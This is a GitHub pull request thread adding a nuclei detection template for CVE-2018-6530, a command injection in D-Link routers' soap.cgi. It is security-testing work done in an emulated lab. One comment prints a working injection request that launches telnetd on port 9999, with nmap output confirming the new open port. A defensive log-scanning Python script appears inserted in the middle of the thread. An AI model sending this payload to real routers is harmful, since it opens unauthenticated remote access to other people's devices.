
Create CVE-2018-6530 #5545

Merged
merged 3 commits into from
Jul 4, 2023

Conversation

gy741
Contributor

@gy741 gy741 commented Oct 2, 2022

Template / PR Information

Hello,

Added CVE-2018-6530

OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

Template Validation

I've validated this template locally?

  • YES
  • NO

OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
@DhiyaneshGeek
Member

@gy741 is it possible to share some set-up instructions to build a vulnerable environment?

@gy741
Contributor Author

gy741 commented Dec 16, 2022

Hello, @DhiyaneshGeek. Because this vulnerability occurs in embedded systems, you must use an emulator such as the qemu emulator.

Ref: #5976

However, the setting method is different for each firmware.

I'll try the analysis.

@gy741
Contributor Author

gy741 commented Dec 17, 2022

Hello, @DhiyaneshGeek @princechaddha

I succeeded in constructing the environment.

But there is one problem with detecting the problem.

I ordered it to run telnetd and checked the connection through nmap and a telnet connection.

Is there any idea how to detect telnet?

NMAP command before template execution:

root@karas:~# nmap 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-17 00:09 EST
Nmap scan report for 192.168.0.1
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
49152/tcp open  unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

Template Execution Log:

root@karas:~# ./nuclei -t ~/test.yaml -u http://192.168.0.1:49152 --debug

POST /soap.cgi?service=whatever-control;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

test

NMAP command after template execution:

root@karas:~# nmap 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-17 00:09 EST
Nmap scan report for 192.168.0.1
Host is up (0.0041s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
9999/tcp  open  abyss    <------------------------ exploit
49152/tcp open  unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

I think wget works, but I currently have no external internet connection available in the emulator environment. :)
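From the defender's side, the request in the debug output above is easy to spot in web-server access logs: the `service` query parameter of `/soap.cgi` is a SOAP service name and should never contain shell metacharacters. The following is an added example (not code from this PR or from the nuclei project) that scans constructed common-log-format lines for that pattern, percent-decoding the parameter first so an encoded `%3B` is caught as well. The log lines, IP addresses and the benign `WANIPConn1` value are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that end or chain a shell command; none belong in a service name.
SHELL_META = re.compile(r"[;|&`$\n\r]")


def query_params(query: str):
    """Split a query string on '&' only (not ';', which is what we are hunting)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        yield unquote_plus(key), unquote_plus(value)


def service_param_injection(request_line: str) -> bool:
    """True if an HTTP request line targets /soap.cgi with shell metacharacters
    in its 'service' parameter (the sink named in the CVE description)."""
    tokens = request_line.split(" ")
    if len(tokens) < 3:            # need METHOD TARGET VERSION
        return False
    target = " ".join(tokens[1:-1])  # target may contain raw spaces, as above
    parts = urlsplit(target)
    if not parts.path.endswith("/soap.cgi"):
        return False
    return any(key == "service" and SHELL_META.search(value)
               for key, value in query_params(parts.query))


def scan_log(lines):
    """Return [(line_no, request_line)] for every suspicious access-log entry.
    Assumes common log format: the request line is the first quoted field."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"([^"]*)"', line)
        if m and service_param_injection(m.group(1)):
            hits.append((n, m.group(1)))
    return hits


# Constructed sample log; line 3 is the request from the nuclei debug output.
SAMPLE_LOG = [
    '192.168.0.10 - - [17/Dec/2022:00:09:01 -0500] "GET /index.html HTTP/1.1" 200 512',
    '192.168.0.10 - - [17/Dec/2022:00:09:02 -0500] "POST /soap.cgi?service=WANIPConn1 HTTP/1.1" 200 87',
    '192.168.0.10 - - [17/Dec/2022:00:09:03 -0500] "POST /soap.cgi?service=whatever-control;telnetd -p 9999;whatever-invalid-shell HTTP/1.1" 200 0',
    '192.168.0.10 - - [17/Dec/2022:00:09:04 -0500] "POST /soap.cgi?service=whatever%3Bwhatever HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for line_no, req in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {req}")
```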

@gy741
Contributor Author

gy741 commented Dec 17, 2022

I tried to verify the PoC using file creation, but the file is not moved to the web folder that is accessible to general users.

Not sure if it's an emulation issue.


@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed waiting for more info labels Jul 3, 2023
@princechaddha princechaddha merged commit 6848ab0 into projectdiscovery:main Jul 4, 2023
2 checks passed